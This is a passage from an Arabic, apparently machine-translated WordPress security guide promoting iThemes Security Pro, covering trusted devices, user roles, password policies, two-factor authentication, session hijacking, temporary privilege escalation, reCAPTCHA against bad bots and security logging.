ثم أدخل عنوان بريدك الإلكتروني ، واختر ما إذا كنت تريد تلقي تحديثات البريد الإلكتروني أم لا ، ثم انقر فوق الزر حفظ .

4. تقييد وصول الجهاز إلى WP Dashboard

تتمثل الخطوة الأخيرة لتأمين تسجيل الدخول إلى WordPress في تقييد الوصول إلى لوحة معلومات WordPress الخاصة بك على مجموعة من الأجهزة. تحدد ميزة iThemes Security Pro Trusted Devices الأجهزة التي تستخدمها أنت والمستخدمون الآخرون لتسجيل الدخول إلى موقع WordPress الخاص بك. عندما يقوم المستخدم بتسجيل الدخول على جهاز غير معروف ، يمكن للأجهزة الموثوقة تقييد إمكانياتها على مستوى المسؤول. هذا يعني أن المتسلل كان قادرًا على تجاوز طرق أمان تسجيل الدخول الأخرى - ليس من المحتمل جدًا - لن يكون لديه القدرة على إجراء أي تغييرات ضارة على موقع الويب الخاص بك.

لبدء استخدام الأجهزة الموثوقة ، قم بتمكينها في الصفحة الرئيسية لإعدادات الأمان ، ثم انقر فوق الزر تكوين الإعدادات .

في إعدادات الأجهزة الموثوقة ، حدد المستخدمين الذين تريد استخدام الميزة ، ثم قم بتمكين ميزات تقييد القدرات والحماية من اختطاف الجلسات .

بعد تمكين إعداد الأجهزة الموثوقة الجديد ، سيتلقى المستخدمون إشعارًا في شريط مسؤول WordPress حول الأجهزة المعلقة غير المعروفة. إذا لم تتم إضافة جهازك الحالي إلى قائمة الأجهزة الموثوقة ، فانقر فوق رابط تأكيد هذا الجهاز لإرسال بريد إلكتروني للترخيص .

انقر فوق زر تأكيد الجهاز في البريد الإلكتروني لتسجيل الدخول غير معروف لإضافة أجهزتك الحالية إلى قائمة الأجهزة الموثوقة.

تغليف

إن إمكانية الوصول إلى صفحة تسجيل الدخول إلى WordPress تجعلها الجزء الأكثر هجومًا - ومن المحتمل أن يكون عرضة للخطر - من أي موقع WordPress. ومع ذلك ، فإن استخدام الخطوات الواردة في هذا القسم سيجعل تسجيل دخولك إلى WordPress غير قابل للاختراق تقريبًا.

القسم 7: تأمين مستخدمي WordPress الخاصين بك

عندما نتحدث عن أمان المستخدم ، غالبًا ما نسمع أسئلة مثل ، هل يجب أن يكون لدى كل مستخدم WordPress نفس متطلبات الأمان ، وما مقدار الأمان الذي يمثل الكثير من الأمان؟

لا تقلق. نحن نجيب على كل هذه الأسئلة. لكن أولاً ، دعنا نتحدث عن الأنواع المختلفة لمستخدمي WordPress.

ما هي الأنواع المختلفة لمستخدمي WordPress؟

هناك 5 مستخدمين افتراضيين مختلفين لـ WordPress.

1. مدير
2. محرر
3. مؤلف
4. مساهم
5. مشترك

لكل مستخدم قدرات مختلفة. تحدد القدرات ما يمكنهم فعله بمجرد وصولهم إلى لوحة القيادة. اقرأ المزيد عن أدوار مستخدم WordPress وأذوناته.

الأضرار المحتملة لمستخدمي WordPress المختلفين الذين تم اختراقهم

قبل أن نتمكن من فهم كيفية تأمين مستخدمي WordPress لدينا ، يجب أن نفهم أولاً مستوى التهديد لكل نوع من المستخدمين المعرضين للخطر. يختلف نوع ومستوى الضرر الذي يمكن أن يلحقه المهاجم بشكل كبير تبعًا لأدوار وقدرات المستخدم الذي يقوم باختراقه.

المسؤول - مستوى التهديد مرتفع

يتمتع المستخدمون المسؤولون بالقدرات على ما يريدون.

• إنشاء وإزالة وتعديل المستخدمين.
• تثبيت وإزالة وتحرير المكونات الإضافية والسمات.
• إنشاء وإزالة وتحرير جميع الوظائف والصفحات.
• نشر وإلغاء نشر المشاركات والصفحات.
• إضافة وإزالة الوسائط.

إذا تمكن أحد المتطفلين من وضع أيديهم على أحد مسؤولي موقعك ، فيمكنهم حجز موقع الويب الخاص بك للحصول على فدية. كما ذكرنا سابقًا ، تشير Ransomware إلى الوقت الذي يستولي فيه أحد المتطفلين على موقع الويب الخاص بك ولن يعيده إليك إلا إذا دفعت رسومًا باهظة لهم.

المحرر - مستوى التهديد مرتفع

يدير المحرر كل محتوى الموقع. لا يزال هؤلاء المستخدمون يتمتعون بقدر كبير من القوة.

• إنشاء وحذف وتحرير جميع المنشورات والصفحات.
• نشر وإلغاء نشر جميع المنشورات والصفحات.
• تحميل ملفات الوسائط.
• إدارة جميع الروابط.
• إدارة التعليقات.
• إدارة الفئات.

إذا استولى أحد المهاجمين على حساب محرر ، فيمكنه تعديل إحدى صفحاتك لاستخدامها في هجوم تصيد احتيالي. التصيد الاحتيالي هو نوع من الهجوم يستخدم لسرقة بيانات المستخدم ، بما في ذلك بيانات اعتماد تسجيل الدخول وأرقام بطاقات الائتمان.

يعد التصيد الاحتيالي أحد أكثر الطرق ضمانًا لإدراج موقع الويب الخاص بك في القائمة السوداء من قِبل Google. كل يوم ، يتم إدراج 10000 موقع على قائمة الحظر الخاصة بـ Google لأسباب مختلفة.

المؤلف - مستوى التهديد متوسط

تم تصميم المؤلف لإنشاء وإدارة المحتوى الخاص بهم.

• إنشاء وحذف وتحرير منشوراتهم وصفحاتهم.
• نشر وإلغاء نشر مشاركاتهم الخاصة.
• تحميل ملفات الوسائط

إذا تمكن المهاجم من التحكم في حساب المؤلف ، فيمكنه إنشاء صفحات ومنشورات ترسل زوار موقعك إلى مواقع ويب ضارة.

المساهم والمشترك - مستوى التهديد منخفض

المساهم هو الإصدار البسيط من دور المستخدم المؤلف. ليس لديهم قوة نشر.

• إنشاء وتحرير مشاركاتهم الخاصة.
• حذف مشاركاتهم غير المنشورة.

يمكن للمشترك قراءة الأشياء التي ينشرها المستخدمون الآخرون.

بينما لا يستطيع المتسللون الذين لهم دور مساهم أو مشترك إجراء أي تغييرات ضارة ، يمكنهم سرقة أي معلومات حساسة مخزنة في حساب المستخدم أو صفحة الملف الشخصي.

6 نصائح لتأمين مستخدمي WordPress الخاصين بك

حسنًا ، هذه بعض الأشياء السيئة جدًا التي يمكن للقراصنة القيام بها على مواقعنا الإلكترونية. الخبر السار هو أنه يمكن منع معظم الهجمات على حسابات مستخدمي WordPress الخاصة بك ببذل القليل من الجهد من جانبك.

دعنا نلقي نظرة على الأشياء التي يمكنك القيام بها لتأمين مستخدمي WordPress الخاصين بك. الحقيقة هي أن طرق أمان WordPress هذه ستساعد في تأمين كل نوع من مستخدمي WordPress. ولكن ، أثناء استعراضنا لكل طريقة من الطرق ، سنخبرك بالمستخدمين الذين يجب أن تطلب منهم استخدام الطريقة.

1. فقط امنح الناس القدرات التي يحتاجونها

أسهل طريقة لحماية موقع الويب الخاص بك هي فقط منح المستخدمين القدرات التي يحتاجون إليها وليس أي شيء آخر. إذا كان الشيء الوحيد الذي سيفعله شخص ما على موقع الويب الخاص بك هو إنشاء وتعديل منشورات المدونة الخاصة به ، فلن يحتاجوا إلى القدرة على تحرير منشورات الآخرين.

2. تأمين مستخدمي WordPress بكلمات مرور قوية

في قائمة تم تجميعها بواسطة Splash Data ، كانت كلمة المرور الأكثر شيوعًا المضمنة في جميع عمليات تفريغ البيانات هي 123456. تفريغ البيانات عبارة عن قاعدة بيانات مخترقة مليئة بكلمات مرور المستخدم الملقاة في مكان ما على الإنترنت. هل يمكنك تخيل عدد الأشخاص على موقع الويب الخاص بك الذين يستخدمون كلمة مرور ضعيفة إذا كانت 123456 هي كلمة المرور الأكثر شيوعًا في عمليات تفريغ البيانات؟

استخدام كلمة مرور ضعيفة يشبه محاولة قفل بابك الأمامي بقطعة من الشريط اللاصق. لم يستغرق المتسللون وقتًا طويلاً حتى يتمكنوا من شق طريقهم عبر كلمة مرور ضعيفة إلى موقع ويب. الآن بعد أن استفاد المتسللون من بطاقات رسومات الكمبيوتر في هجماتهم ، لم يكن الوقت الذي يستغرقه اختراق كلمة المرور أقل من أي وقت مضى.

على سبيل المثال ، دعنا نلقي نظرة على مخطط أنشأته شركة Terahash ، وهي شركة عالية الأداء لاختراق كلمات المرور. يوضح الرسم البياني الخاص بهم الوقت الذي يستغرقه اختراق كلمة المرور باستخدام مجموعة تجزئة تبلغ 448x RTX 2080s.

بشكل افتراضي ، يستخدم WordPress MD5 لتجزئة كلمات مرور المستخدم المخزنة في قاعدة بيانات WP. لذلك ، وفقًا لهذا الرسم البياني ، يمكن لـ Terahash كسر كلمة مرور مكونة من 8 أحرف… على الفور تقريبًا. هذا ليس مثيرًا للإعجاب فحسب ، بل إنه مخيف حقًا أيضًا. الخبر السار هو أنه يمكننا تأمين تسجيل الدخول إلى WordPress الخاص بنا من خلال مطالبة مستخدمينا رفيعي المستوى باستخدام كلمات مرور قوية.

تتيح لك ميزة متطلبات كلمات مرور iThemes Security Pro إجبار مستخدمين محددين على استخدام كلمة مرور قوية. قم بتمكين ميزة متطلبات كلمة المرور في الصفحة الرئيسية لإعدادات الأمان ، ثم حدد المستخدمين الذين تريد طلبهم لاستخدام كلمة مرور قوية.

3. كلمات المرور المخترقة المرفوضة

وفقًا لتقرير تحقيقات خرق بيانات Verizon ، يعيد أكثر من 70٪ من الموظفين استخدام كلمات المرور في العمل. لكن الإحصائيات الأكثر أهمية من التقرير هي أن 81٪ من الانتهاكات المتعلقة بالقرصنة استفادت من كلمات المرور المسروقة أو الضعيفة.

يستخدم المتسللون شكلاً من أشكال القوة الغاشمة المهاجمة يسمى هجوم القاموس. هجوم القاموس هو طريقة لاقتحام موقع WordPress باستخدام كلمات مرور شائعة الاستخدام ظهرت في مقالب قاعدة البيانات. "المجموعة رقم 1؟ تضمنت عملية اختراق البيانات التي تمت استضافتها على موقع MEGA 1،160،253،228 مجموعة فريدة من عناوين البريد الإلكتروني وكلمات المرور. هذا هو مليار مع ب. سيساعد هذا النوع من النقاط حقًا هجوم القاموس على تضييق كلمات مرور WordPress الأكثر استخدامًا.

من الضروري منع المستخدمين الذين يتمتعون بقدرات مستوى المؤلف وما فوق من استخدام كلمات المرور المخترقة لتأمين تسجيل الدخول إلى WordPress الخاص بك. قد تفكر أيضًا في عدم السماح للمستخدمين ذوي المستوى الأدنى باستخدام كلمات المرور المخترقة.

إنه أمر مفهوم تمامًا ويتم تشجيعه على جعل إنشاء حساب عميل جديد أمرًا سهلاً قدر الإمكان. ومع ذلك ، قد لا يعرف عميلك أنه تم العثور على كلمة المرور التي يستخدمها في ملف تفريغ البيانات. ستقدم لعملائك خدمة رائعة من خلال تنبيههم إلى حقيقة أن كلمة المرور التي يستخدمونها قد تم اختراقها. إذا كانوا يستخدمون كلمة المرور هذه في كل مكان ، فيمكنك حفظهم من بعض المشاكل الرئيسية في المستقبل.

تفرض ميزة iThemes Security Pro Refuse Compromised Passwords (كلمات المرور المخترقة) على المستخدمين استخدام كلمات المرور التي لم تظهر في أي خروقات لكلمات المرور تتبعها Have I Been Pwned. قم بتمكين ميزة متطلبات كلمة المرور على الصفحة الرئيسية لإعدادات الأمان ، ثم حدد المستخدمين الذين تريد منعهم من استخدام كلمة مرور تم اختراقها.

4. تأمين مستخدمي WordPress من خلال المصادقة الثنائية

يعد استخدام المصادقة ذات العاملين أفضل شيء يمكنك القيام به لتأمين تسجيل الدخول إلى WordPress الخاص بك. المصادقة الثنائية هي عملية التحقق من هوية الشخص من خلال طلب طريقتين منفصلتين للتحقق. شاركت Google على مدونتها أن استخدام المصادقة الثنائية يمكن أن يوقف 100٪ من هجمات الروبوت الآلية. أنا حقا أحب تلك الاحتمالات.

توفر ميزة المصادقة الثنائية من iThemes Security Pro قدرًا كبيرًا من المرونة عند تنفيذ 2fa على موقع الويب الخاص بك. يمكنك تمكين عاملين لجميع المستخدمين أو بعضهم ، ويمكنك إجبار المستخدمين رفيعي المستوى على استخدام 2fa عند كل تسجيل دخول.

لراحتك ، يوفر iThemes Security Pro طريقتين مختلفتين للمصادقة الثنائية.

1. تطبيق الهاتف المحمول - طريقة تطبيق الهاتف المحمول هي الطريقة الأكثر أمانًا للمصادقة الثنائية التي يوفرها iThemes Security Pro. تتطلب هذه الطريقة استخدام تطبيق جوال مجاني ثنائي العوامل مثل Authy.
2. البريد الإلكتروني - طريقة البريد الإلكتروني ذات العاملين سترسل رموزًا حساسة للوقت إلى عنوان البريد الإلكتروني للمستخدم.
3. رموز النسخ الاحتياطي - مجموعة من أكواد الاستخدام لمرة واحدة والتي يمكن استخدامها لتسجيل الدخول في حالة فقد الطريقة الأساسية ثنائية العاملين.

5. تأمين مستخدمي WordPress من اختطاف الجلسة

يقوم WordPress بإنشاء ملف تعريف ارتباط للجلسة في كل مرة تقوم فيها بتسجيل الدخول إلى موقع الويب الخاص بك. ودعنا نقول أن لديك امتداد متصفح تخلى عنه المطور ولم يعد يصدر تحديثات أمنية. لسوء الحظ ، فإن امتداد المتصفح المهمل به ثغرة أمنية. تسمح الثغرة الأمنية للممثلين السيئين باختطاف ملفات تعريف الارتباط في متصفحك ، بما في ذلك ملف تعريف ارتباط جلسة WordPress المذكور سابقًا. يُعرف هذا النوع من الاختراق باسم اختطاف الجلسة . لذلك ، يمكن للمهاجم استغلال ضعف الامتداد لإلغاء تسجيل الدخول الخاص بك والبدء في إجراء تغييرات ضارة مع مستخدم WordPress الخاص بك.

يجب أن يكون لديك حماية من اختطاف الجلسة للمشرفين والمحررين.

تجعل ميزة iThemes Security Pro Trusted Devices من اختطاف الجلسة شيئًا من الماضي. إذا تغير جهاز المستخدم أثناء الجلسة ، فسيقوم iThemes Security بتسجيل خروج المستخدم تلقائيًا لمنع أي نشاط غير مصرح به على حساب المستخدم ، مثل تغيير عنوان البريد الإلكتروني للمستخدم أو تحميل المكونات الإضافية الضارة.

6. قم بإنشاء مستخدم دعم عام

في أي وقت تنشئ فيه مستخدمًا جديدًا ، فأنت تضيف نقطة دخول أخرى يمكن للمتسلل استغلالها. ولكن من المحتمل أن تكون هناك أوقات قد تحتاج فيها إلى بعض المساعدة الخارجية لموقعك على الويب ، مثل عندما تبحث عن دعم أو بعد التعاقد مع مقاول مستقل. أنت بحاجة إلى طريقة آمنة وآمنة لإضافة وصول إداري مؤقت إلى موقع الويب الخاص بك.

على سبيل المثال ، لنفترض أنك واجهت بعض المشكلات مع أحد المكونات الإضافية المثبتة على موقع الويب الخاص بك. بعد الاتصال بالدعم ، يطلبون وصول المسؤول إلى موقع الويب الخاص بك حتى يتمكنوا من إلقاء نظرة فاحصة. يبدو أن هذا طلب معقول تمامًا وأنت تقرر منحهم حق الوصول.

إذن كيف نمنح شخصًا ما وصول مسؤول مؤقت إلى موقع WordPress الخاص بنا؟

منح الوصول الخارجي إلى موقع الويب الخاص بك: الخياران

عادة ، لديك خياران لتوفير الوصول الخارجي إلى موقع الويب الخاص بك…. ولا شيء رائع .

1. شارك أوراق اعتماد المستخدم الخاص بك

خيارك الأول والأسوأ هو مشاركة اسم المستخدم وكلمة المرور لمستخدم مسؤول WordPress الخاص بك.

لماذا تعتبر مشاركة بيانات اعتماد المسؤول أمرًا فظيعًا

• أمان منخفض - إذا قمت بمشاركة بيانات اعتماد المستخدم الخاصة بك ، فسيتعين عليك تعطيل المصادقة الثنائية للسماح للشخص الذي يستخدم بيانات اعتمادك بتسجيل الدخول. شاركت Google على مدونتها أن استخدام المصادقة ذات العاملين ، أو التحقق بخطوتين ، يمكن أن يوقف 100٪ من هجمات الروبوت الآلية. يؤدي تعطيل المصادقة ذات العاملين ، حتى لفترة قصيرة من الوقت ، إلى تقليل أمان موقع الويب بشكل كبير.
• غير مريح - تتطلب مشاركة بيانات الاعتماد الخاصة بك تغيير كلمة المرور الخاصة بك. إذا نسيت تغيير كلمة المرور الخاصة بك ، فهناك شخص واحد أو أكثر لديهم حق وصول المسؤول إلى موقع الويب الخاص بك متى أرادوا ذلك.

2. قم بإنشاء مستخدم جديد لتقنية الدعم

في حين أن إنشاء مستخدم إداري جديد لأخصائي الدعم أفضل من مشاركة بيانات اعتماد المسؤول ، إلا أنه لا يزال غير رائع.

لماذا يعد إنشاء مستخدم لتقنية الدعم أمرًا فظيعًا

• زيادة الضعف - يؤدي إنشاء مستخدم مسؤول جديد إلى إضافة نقطة دخول أخرى يمكن استغلالها. إذا لم يكن لديك سياسة كلمة مرور مطبقة ، فقد تختار تقنية الدعم كلمة مرور ضعيفة ، مما يجعل تسجيل الدخول إلى WordPress الخاص بك أكثر عرضة للهجوم.
• غير مريح - إجراء عملية إعداد مستخدم جديد في أي وقت تحتاج فيه إلى مساعدة خارجية يستغرق وقتًا طويلاً. يجب عليك إنشاء المستخدم الجديد ثم تذكر حذف المستخدم عندما لا يكون بحاجة إلى الوصول إلى موقع الويب الخاص بك. إنها أفضل ممارسات أمان WordPress لإزالة أي مستخدمين غير مستخدمين من موقع الويب الخاص بك.

ما هو تصعيد الامتياز؟

تتيح لك ميزة iThemes Security Pro Privilege Escalation منح المستخدم إمكانيات إضافية بشكل مؤقت.

تسهّل ميزة تصعيد الامتياز إنشاء مستخدم عالمي يمكنك منحه لأي مطورين خارجيين أو دعم فني يحتاج إلى وصول مؤقت إلى موقع الويب الخاص بك بطريقة سهلة وآمنة.

مع تصعيد الامتياز ، يمكنك إنشاء مستخدم جديد وتسميته بالدعم ومنحه دور المستخدم المشترك. في المرة التالية التي تحتاج فيها إلى توفير وصول مؤقت إلى موقع الويب الخاص بك ، يمكنك نقل مستخدم الدعم من مشترك إلى مسؤول. سوف نتعرف على كيفية القيام بذلك لاحقًا في المنشور ، ولكن أولاً ، دعنا نتحدث عن سبب كون تصعيد الامتياز طريقة أفضل لمنح الوصول إلى موقع الويب الخاص بك.

لماذا يعتبر تصعيد الامتيازات أفضل

• سهل - ليس عليك إنشاء مستخدم جديد في كل مرة تحتاج فيها إلى منح حق الوصول إلى موقع الويب الخاص بك.
• تلقائي - يستمر تصعيد الامتياز لمدة 24 ساعة فقط. بعد مرور 24 ساعة ، يفقد المستخدم تلقائيًا جميع الامتيازات الإضافية. لا يتعين عليك تذكر إزالة المستخدمين أو تغيير أي كلمات مرور.
• لا تضحية في الأمان - لا يزال بإمكانك مطالبة مستخدم الدعم العام هذا باستخدام طريقة البريد الإلكتروني ذات العاملين لتسجيل الدخول ، مما يعني أن لديك نفس مستوى الأمان كما تفعل مع المستخدمين المسؤولين الآخرين. نظرًا لأن دور المستخدم الفعلي هو مشترك ، فأنت لا تخاطر بتركه على موقع الويب الخاص بك.

كيفية استخدام تصعيد الامتياز في iThemes Security Pro

للبدء ، قم بتمكين تصعيد الامتياز في الصفحة الرئيسية لإعدادات الأمان.

يمكنك إنشاء مستخدم جديد وتسميته بالدعم ومنحه دور المستخدم المشترك. في المرة التالية التي تحتاج فيها إلى توفير وصول مؤقت إلى موقع الويب الخاص بك ، انتقل إلى صفحة ملف تعريف مستخدم الدعم.

قم بتحديث عنوان البريد الإلكتروني للسماح لشخص الدعم الخارجي بطلب كلمة مرور جديدة. ثم قم بالتمرير لأسفل حتى ترى إعدادات تصعيد الامتياز المؤقت. انقر فوق تبديل تعيين الدور المؤقت ، وحدد المسؤول. سيكون لدى المستخدم الآن حق وصول المسؤول لمدة 24 ساعة القادمة.

إذا لم يكونوا بحاجة إلى 24 ساعة كاملة ، فيمكنك إبطال تصعيد الامتياز من صفحة ملف تعريف المستخدم. إذا كنت بحاجة إلى أكثر من 24 ساعة ، فيمكنك تعيين عدد الأيام التي تحتاجها بالضبط في حقل الأيام .

تغليف

تجعل شعبية WordPress منه هدفًا للمتسللين في جميع أنحاء العالم. كما ناقشنا ، يمكن أن يتسبب المهاجم في حدوث ضرر عن طريق اختراق أدنى مستوى لمستخدم WordPress.

الخبر السار هو أنه على الرغم من عدم وجود طريقة لمنع الهجمات على مستخدمي WordPress الخاصين بك ، مع القليل من الجهد من جانبنا ، يمكننا منع الهجمات من النجاح.

القسم 8: حماية موقع الويب الخاص بك من البرامج الآلية السيئة

في هذا القسم من دليل أمان WordPress ، ستتعرف على ما هو الروبوت وكيفية منع الروبوتات السيئة من إحداث فوضى على موقع الويب الخاص بك.

ما هو البوت؟

الروبوت هو جزء من البرنامج تمت برمجته لأداء قائمة محددة من المهام. ينشئ المطورون مجموعة من الإرشادات التي سيتبعها الروبوت تلقائيًا دون أن يحتاج المطور إلى إخبارهم للبدء. ستؤدي الروبوتات مهامًا متكررة ودنيوية بطريقة أسرع مما نستطيع.

بوتات مختلفة تزحف باستمرار إلى موقع الويب الخاص بك. بعض هذه الروبوتات جيدة وتوفر لك خدمة قيمة. لدى الروبوتات الأخرى دوافع أكثر شناعة. دعنا نتوقف لحظة للحديث عن ماهية الروبوت وأنواع الروبوتات المختلفة.

الروبوتات الجيدة

روبوتات المراقبة - يستخدم iThemes Sync Pro Uptime Monitoring برنامجًا آليًا لمراقبة وقت تشغيل موقع الويب الخاص بك. يتحقق الروبوت من موقع الويب الخاص بك كل 5 دقائق للتحقق من أنه لا يزال متصلاً بالإنترنت. إذا كان موقع الويب الخاص بك معطلاً ، فسيرسل الروبوت إليك تنبيهًا حتى تتمكن من إعادة موقعك على الإنترنت.

روبوتات التدقيق - يستخدم iThemes Sync Pro Site Audit برنامج Google Lighthouse bot للتحقق من جودة صفحات الويب الخاصة بك. مثال آخر ممتاز على روبوت التدقيق هو مدقق الروابط المعطل الذي سيزحف إلى موقع الويب الخاص بك بحثًا عن الروابط التي ترسلك إلى موقع غير موجود.

Feeder Bots - من الأمثلة الممتازة لروبوتات التغذية مشغل البودكاست الخاص بك. يستخدم مشغل البودكاست الخاص بك روبوتًا لمراقبة موجز RSS للبودكاست الذي تشترك فيه وينبهك عندما يصدر البودكاست المفضل لديك حلقة جديدة.

روبوتات محرك البحث - زاحف الويب من Google هو مثال على روبوت محرك البحث. سيقوم هذا النوع من الروبوتات بالزحف إلى موقع الويب الخاص بك بحثًا عن صفحات جديدة أو معدلة وإنشاء فهرس لموقع الويب الخاص بك. بمجرد أن يكون لدى Google أو محرك بحث آخر فهرس لموقع الويب الخاص بك ، سيتمكنون من مشاركة صفحاتك مع الأشخاص الذين يستخدمون محرك البحث الخاص بهم.

روبوتات الأمان - يستخدم برنامج iThemes Security Pro Site Scan روبوتًا لمقارنة قائمة المكونات الإضافية والسمات المثبتة بقاعدة بيانات الثغرات الأمنية لدينا. إذا كان لديك مكون إضافي أو سمة مثبتة مع ثغرة أمنية معروفة ، فسيقوم الروبوت تلقائيًا بتطبيق تصحيح إذا كان متاحًا.

الروبوتات السيئة

برامج اقتطاف المحتوى - تمت برمجة هذه الروبوتات لتنزيل محتويات موقع الويب الخاص بك دون إذنك. يمكن أن يكرر الروبوت المحتوى لاستخدامه على موقع المهاجم لتحسين مُحسّنات محرّكات البحث الخاصة به وسرقة حركة المرور على موقعك.

Spambots - Spambots مزعجة. سوف يفسدون تعليقاتك بوعود بأن تصبح مليونيراً أثناء العمل من المنزل على أمل إرسال زوار موقعك إلى مواقع ويب ضارة.

روبوتات القوة الغاشمة - تجوب روبوتات القوة الغاشمة الإنترنت بحثًا عن عمليات تسجيل دخول WordPress للهجوم. بمجرد وصول هذه الروبوتات إلى صفحة تسجيل الدخول ، سيحاولون أبسط شكل للوصول إلى الموقع: من خلال محاولة تخمين أسماء المستخدمين وكلمات المرور ، مرارًا وتكرارًا ، حتى تنجح.

كيفية منع الروبوتات السيئة دون حظر برامج التتبع الجيدة: reCAPTCHA V3.0

يساعد برنامج reCAPTCHA من Google على منع الروبوتات السيئة من الانخراط في أنشطة مسيئة على موقع الويب الخاص بك ، مثل محاولة اقتحام موقع الويب الخاص بك باستخدام كلمات مرور تم اختراقها أو نشر رسائل غير مرغوب فيها أو حتى إلغاء المحتوى الخاص بك.

ومع ذلك ، سيتمكن المستخدمون الشرعيون من تسجيل الدخول أو إجراء عمليات شراء أو عرض الصفحات أو إنشاء حسابات. تستخدم reCAPTCHA تقنيات متقدمة لتحليل المخاطر للتمييز بين البشر والروبوتات.

تحمي ميزة reCAPTCHA من Google في iThemes Security Pro موقعك من الروبوتات السيئة. تحاول هذه الروبوتات اقتحام موقع الويب الخاص بك باستخدام كلمات مرور مخترقة أو نشر بريد عشوائي أو حتى كشط المحتوى الخاص بك. تستخدم reCAPTCHA تقنيات متقدمة لتحليل المخاطر للتمييز بين البشر والروبوتات.

ما يميز reCAPTCHA الإصدار 3 هو أنه يساعدك على اكتشاف حركة مرور الروبوتات المسيئة على موقع الويب الخاص بك دون أي تفاعل من المستخدم. بدلاً من إظهار اختبار CAPTCHA ، يراقب reCAPTCHA v3 الطلبات المختلفة التي يتم إجراؤها على موقعك ويعيد النتيجة لكل طلب. تتراوح النتيجة من 0.01 إلى 1. وكلما زادت الدرجة التي قدمتها reCAPTCHA ، زادت الثقة في أن الإنسان قدم الطلب. كلما انخفضت هذه النتيجة التي أرجعها reCAPTCHA ، زادت الثقة في أن الروبوت قد قام بالطلب.

يسمح لك iThemes Security Pro بتعيين حد حظر باستخدام نتيجة reCAPTCHA. توصي Google باستخدام 0.5 كإعداد افتراضي. ضع في اعتبارك أنه يمكنك حظر المستخدمين الشرعيين عن غير قصد إذا قمت بتعيين العتبة عالية جدًا.

يمكنك تمكين reCAPTCHA في تسجيل مستخدم WordPress الخاص بك وإعادة تعيين كلمة المرور وتسجيل الدخول والتعليقات. يسمح لك iThemes Security Pro بتشغيل برنامج Google reCAPTCHA النصي على جميع الصفحات لزيادة دقة الروبوت مقابل النتيجة البشرية.

تغليف

هناك روبوتات جيدة وروبوتات سيئة. يحظر reCAPTCHA الروبوتات السيئة من موقع الويب الخاص بك دون أن يقف في طريق الروبوتات الجيدة التي توفر قيمة.

القسم 9: سجلات أمان WordPress

يعد التسجيل جزءًا أساسيًا من استراتيجية أمان WordPress الخاصة بك. يمكن أن يؤدي عدم كفاية التسجيل والمراقبة إلى تأخير في اكتشاف خرق أمني. تظهر معظم دراسات الاختراق أن الوقت اللازم لاكتشاف الاختراق يزيد عن 200 يوم! يسمح هذا المقدار من الوقت للمهاجم باختراق أنظمة أخرى أو تعديل أو سرقة أو إتلاف المزيد من البيانات. لهذه الأسباب ، وصل التسجيل غير الكافي إلى قائمة OWASP العشرة الأولى من مخاطر أمان تطبيقات الويب.

تتمتع سجلات أمان WordPress بالعديد من الفوائد في إستراتيجية الأمان الشاملة الخاصة بك.

1. الهوية ووقف السلوك الخبيث.
2. حدد نشاطًا يمكن أن ينبهك إلى حدوث خرق.
3. تقييم مقدار الضرر الذي حدث.
4. مساعد في إصلاح موقع تم الاستيلاء عليه.

إذا تعرض موقعك للاختراق ، فستحتاج إلى الحصول على أفضل المعلومات للمساعدة في تحقيق سريع واسترداد.

ما هي سجلات أمان WordPress؟

تقوم سجلات أمان WordPress في iThemes Security Pro بتتبع الأحداث الأمنية المهمة التي تحدث على موقع الويب الخاص بك. تعتبر هذه الأحداث مهمة للمراقبة للإشارة إلى ما إذا كان هناك خرق أمني يحدث أم لا.

تعد سجلات أمان موقع الويب الخاص بك جزءًا حيويًا من أي استراتيجية أمنية. يمكن استخدام المعلومات الموجودة في هذه السجلات لإغلاق الجهات الفاعلة السيئة ، وتسليط الضوء على تغيير غير مرغوب فيه على الموقع ، والمساعدة في تحديد نقطة دخول هجوم ناجح وتصحيحها.

أحداث الأمان التي يتم تعقبها وتسجيلها بواسطة أمان iThemes

إليك نظرة على أحداث أمان WordPress التي تم تتبعها بواسطة المكون الإضافي iThemes Security Pro.

1. ووردبريس القوة الغاشمة الهجمات

تشير هجمات القوة الغاشمة إلى طريقة التجربة والخطأ المستخدمة لاكتشاف أسماء المستخدمين وكلمات المرور لاختراق موقع ويب. لا يتتبع WordPress أي نشاط لتسجيل دخول المستخدم ، لذلك لا يوجد أي شيء مضمّن في WordPress لحمايتك من هجوم القوة الغاشمة. الأمر متروك لك لمراقبة أمان تسجيل الدخول لحماية موقع WordPress الخاص بك.

لحسن الحظ ، فإن هجوم القوة الغاشمة ليس معقدًا للغاية ، ومن السهل جدًا التعرف عليه في سجلاتك. ستحتاج إلى تسجيل اسم المستخدم وعنوان IP الذي يحاول تسجيل الدخول وما إذا كان تسجيل الدخول ناجحًا أم لا. إذا رأيت أن اسم مستخدم واحدًا أو IP لديه محاولات تسجيل دخول فاشلة متتالية ، فمن المحتمل أنك تتعرض لهجوم القوة الغاشمة.

بمجرد أن تعرف أن موقع الويب الخاص بك يتعرض للهجوم ، يمكنك وضع حد له! من المهم أن تتذكر أنه لا توجد طريقة لمنع حدوث هجوم على موقع الويب الخاص بك. ولكن من خلال مراقبة محاولات تسجيل الدخول غير الصالحة ، يمكنك منع هذه الهجمات من النجاح.

iThemes Security Pro رائع في منع الأشرار. ومع ذلك ، إذا استخدم شخص سيئ اسم المستخدم Bob في هجوم القوة الغاشمة ، وكان Bob مستخدمًا فعليًا على الموقع ، فسيتم حظر بوب ، للأسف ، مع المهاجم.

على الرغم من أنه من الرائع منع الأشرار من اقتحام أحد المواقع ، إلا أننا لا نحب ذلك عندما يؤثر الأمان على تجربة المستخدمين الحقيقية. أنشأنا روابط سحرية للسماح للمستخدمين الشرعيين بتجاوز قفل اسم المستخدم ، بينما يظل مهاجم القوة الغاشمة مغلقًا.

2. فحص البرامج الضارة

لا يجب عليك إجراء عمليات فحص للبرامج الضارة فحسب ، بل يجب عليك أيضًا تسجيل نتائج كل فحص للبرامج الضارة في سجلات أمان WordPress الخاصة بك. ستسجل بعض سجلات الأمان نتائج الفحص التي وجدت برامج ضارة فقط ، لكن هذا لا يكفي. من الأهمية بمكان أن يتم تنبيهك بأسرع ما يمكن لخرق لموقعك على الويب. كلما استغرقت وقتًا أطول للتعرف على الاختراق ، زاد الضرر الذي ستحدثه.

في حين أنه من الجيد رؤية تاريخ النهج الاستباقي لتحقيق الأمان ، فهذه مجرد مكافأة وليست سببًا لتسجيل كل عملية مسح للبرامج الضارة.

